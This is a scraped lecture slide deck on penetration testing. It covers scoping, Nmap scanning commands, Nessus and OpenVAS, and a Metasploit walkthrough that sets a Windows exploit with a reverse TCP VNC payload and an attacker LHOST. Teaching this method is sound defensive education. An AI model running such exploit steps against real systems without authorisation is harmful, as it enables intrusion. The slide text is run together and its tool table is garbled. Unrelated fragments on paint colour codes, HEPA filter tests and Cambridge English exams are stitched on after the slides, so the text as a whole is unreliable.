Penetration Testing - Brown University
Penetration Testing12/7/2010Penetration Testing1What Is a Penetration Testing? Testing the security of systems andarchitectures from the point of view of anattacker (hacker, cracker ) A “simulated attack” with a predeterminedgoal that has to be obtained within a fixedtime12/7/2010Penetration Testing2
Penetration Testing Is Not An alternative to other IT security measures –it complements other tests Expensive game of Capture the Flag A guarantee of security12/7/2010Penetration Testing3Authorization Letter Detailed agreements/scope– Anything off limits?– Hours of testing?– Social Engineering allowed?– War Dialing?– War Driving?– Denials of Service?– Define the end point Consult a lawyer before starting the test12/7/2010Penetration Testing4
To Tell or Not to Tell? Telling too many people may invalidate thetest However, you don’t want valuable resourceschasing a non-existent “intruder” very long And, elevation procedures make not tellingrisky12/7/2010Penetration TestingBlack Boxvs. It treats the systemas a "black-box", soit doesn't explicitlyuse knowledge ofthe internalstructure.12/7/20105White Box It allows one to peekinside the "box", andit focuses specificallyon using internalknowledge of thesoftware to guide theselection of test dataPenetration Testing6
OSSTMM OSSTMM – Open-Source Security TestingMethodology ManualVersion 3.0 RC 26 at m.htmIt defines how to go about performing a pentest, but does not go into the actual tools.12/7/2010Penetration Testing7Technique – Penetration Testing1)2)3)4)5)6)Gather InformationScan IP addressesFingerprintingIdentify vulnerable servicesExploit vulnerability (with care!)Fix problems ?12/7/2010Penetration Testing8
Gathering Information Goal – Given a company’s name, determineinformation like:– what IP address ranges they have WHOIS (arin.net ) Nslookup– personal information Social engineering Google we.register.it12/7/2010Penetration Testing9Scan IP Addresses Goal – Given a set of IP addresses, determinewhat services and Operating Systems each isrunning. Nmap – www.nmap.org Gfi languard 12/7/2010Penetration Testing10
Fingerprinting What web server is running?What accounts have I found?What services are running?What OSes are running?Who is logged in?Is there available information on the web site?12/7/2010Penetration Testing11Identify Vulnerable Services Given a specific IP address and port, try to gainaccess to the machine. Report all knownvulnerabilities for this target. Nessus OpenVAS 12/7/2010Penetration Testing12
12/7/2010Penetration Testing1312/7/2010Penetration Testing14
Exploit vulnerability Try to exploit detected vulnerabilities, forexample:– Buffer overflow– Heap overflow– SQL injection– Code injection– Cross-site scripting Metasploit is a framework that allows to testattacks12/7/2010Penetration Testing1512/7/2010Penetration Testing16
AlternativesToolsCore ImpactImmunity Canvas25.000 Open-source (butsome libraries areonly in binaries)-1.450 Open source3 months of updatesand supportmore of 150SecurityForestMetasploitFeaturesLicenseNumber of ExploitsFrequently (weekly)UpdatesPlatform 2500 (at February2005)Frequently (average 4 Occasionally (lastexploit every month) updates in 2005)Only WindowsIndependentOnly WindowsPythonPythonReport system /Integrationwithvulnerabilityassessment tools0-day payloadPerl for framework,many others languagesfor exploits(C,Perl,Python,Ruby,Shell,.)Number of precompiled exploits (seeExploitationTree)Program LanguageAdvantagesFree and Open-source Free and Open-source191 (at October 2007)Occasionally (lastupdates on October2007)IndependentRuby, C, AssemblerFree /IDS-IPS evasion /support to writeexploits and large usedin security communityPenetration TestTutorial12/7/2010Penetration Testing18
Nmap (Network Mapper)Port Division- open, closed, filtered, unfiltered, open filtered andclosed filteredScanning techniques-sS (TCP SYN scan)-sT (TCP connect() scan)-sU (UDP scans)-sA (TCP ACK scan)-sW (TCP Window scan)-sM (TCP Maimon scan)--scanflags (Custom TCP scan)-sI zombie host[:probeport] (Idlescan)-sO (IP protocol scan)-sN; -sF; -sX (TCP Null, FIN, and Xmas scans)-b ftp relay host (FTP bounce scan)12/7/2010Penetration Testing19Identify active hosts and servicesin the network ping sweep useful to identify targets and to verify alsorogue hosts Ex:– nmap -v -sP 192.168.100.0/24 -sP Ping scan. port scanning useful to identify active ports (servicesor daemons) that are running on the targets Ex:– nmap -v -sT 192.168.100.x -sT normal scan -sS stealth scan12/7/2010Penetration Testing20
Identify target OS version OS Fingerprinting: there are differentvalues for each OS (Ex. TCP stack, ) Ex: Nmap –O target linux 2.4ttl64packet length60initial windows5840mss512ip id0enabled tcp opt MNNTNWtimestamp inc. 100hzsackOKSYN attempts512/7/2010linux 2.664605840512randomMNNTNW1000hzOK5openbsdwindows orted unsupportedOKOK43windows 2000windows NTMNWunsupported unsupportedOKOK33Penetration Testing21Vulnerability scanning Nessus is a leader tool in vulnerabilityscanning There are two components :– nessusd server with plugins’ list of knownvulnerabilities (there are different kinds ofsubscription depending on how old are plugins)– nessus is a front end of the tool there are severalversion for windows and linux systems12/7/2010Penetration Testing22
Introduction to Nessus Created by Renaud Deraison Currently Maintained by Tenable Network Security Uses the NASL Scripting language for it’s plugins(currently over 13,000 plugins!) Price is still Free! But no more open source Register to obtain many NASL plugins (7 day delay). Or Purchase a Direct Feed for the Latest!12/7/2010Penetration Testing23Nessus Features Client/Server Architecture SSL/PKI supported Smart Service Recognition– (i.e. FTP on 31337) Non-Destructive or Thorough Tests Vulnerability Mapping to CVE, Bugtraq, and others Vulnerability Scoring using CVSS from NIST.12/7/2010Penetration Testing24
OpenVAS OpenSource Vulnerability Assessment Scanner Previously GNessUs (a GPL fork of the Nessus) OpenVAS is a security scanner to allow futurefree development of the now-proprietaryNESSUS tool OpenVAS now offers 15’000 NetworkVulnerability Tests (NVTs) more all NASLplugins.12/7/2010Penetration Testing25Open VAS technology12/7/2010Penetration Testing26
Exploit vulnerabilities metasploit is a framework that allows toperform real attacks You need to start metasploit from the startmenu(Penetration Test- Framework 3)– msfconsole12/7/2010Penetration Testing27Select the exploit and the payload Select an exploit:– msf use windows/http/altn webadmin– msf exploit(altn webadmin) Select the payload for the exploit (setting thePAYLOAD global datastore)– msf exploit(altn webadmin) set PAYLOAD windows/vncinject/reverse tcp PAYLOAD windows/vncinject/reverse tcp12/7/2010Penetration Testing28
Set options for exploit and payload Show options– msf exploit(altn webadmin) show options Set the options:––––msf set RHOST 192.168.100.x TARGET IPmsf set RPORT 1000 VULNERABLE SERVICEmsf set LHOST 192.168.100.Y ATTACKER IPmsf set TARGET 0 TYPE OF EXPLOIT Launch the exploit– msf exploit(altn webadmin) exploit12/7/2010Penetration Testing29Vulnerabilities disclosure If we find a new vulnerability (Zero DayVulnerability) What we have to do?– Do not say anything and maintain the secret perhaps inthe future the producer will fix it– Spread the information: to all or just to the producer– Which level of detail reveal Full disclosure with possibility of helping cracker? Partial disclosure that could be unuseful?– Sell it 12/7/2010Penetration Testing30
Penetration Testing 12/7/2010 Penetration Testing 1 What Is a Penetration Testing? Testing the security
Assessment, Penetration Testing, Vulnerability Assessment, and Which Option is Ideal to Practice? Types of Penetration Testing: Types of Pen Testing, Black Box Penetration Testing. White Box Penetration Testing, Grey Box Penetration Testing, Areas of Penetration Testing. Penetration Testing Tools, Limitations of Penetration Testing, Conclusion.
8002 Signal Brown 8003 Clay Brown 8004 Copper Brown 8007 Fawn Brown 8008 Olive Brown 8011 Nut Brown 8012 Red Brown 8014 Sepia Brown 8015 Chestnut Brown 8016 Mahogany Brown 8017 Chocolate Brown 8019 Grey Brown 8022 Black Brown 8023 Orange Brown 8024 Beige Brown 8025 Pale Brown. 8028 Earth Brown 9001 Cream 9002 Grey White 9003 Signal White
Open Web Application Security Project (OWASP) National Institute of Standards and Technology (NIST) Penetration Testing Execution Standard (PTES) What is PTES? PTES, penetration testing execution standard, as the name implies is an assessment methodology for penetration testing. It covers everything related to a penetration test.
Penetration testing also helps an organization determine how susceptible or resilient to attack it really is. The process of penetration testing involves a great deal of time and dedication to ensure a positive outcome for both the penetration tester and the organization being evaluated. Comparing penetration testing to other real-world types .
The in-place penetration test using the laser particle counter is a measurement of the penetration of the total filtration system. This test incorporates the aerosol penetration from both the HEPAfilter and leaks in the filter housing or gaskets. In separate filter penetration and leak tests, the total penetration of the filtration
2020 Pen Testing Report www.coresecurity.com 11 In-House Penetration Testing Efforts Figure 10: In-house penetration testing While some businesses exclusively enlist the services of a third-party penetration testing team, it is now quite common to build an in-house team, with 42% of respondents working at organizations that have one
network-layer penetration test and application-layer penetration tests. There was a short informational supplement released in 2008 by the PCI Council on penetration testing, but its guidance was very general and still left much room for interpreting what a penetration test rea
Keep Cambridge English: Young Learners relevant to the evolving needs of learners and schools. Incorporate evolving approaches to best practice for teaching and assessing young learners. Ensure there is a clear progression from Cambridge English: Young Learners to Cambridge English exams for secondary schools and beyond.
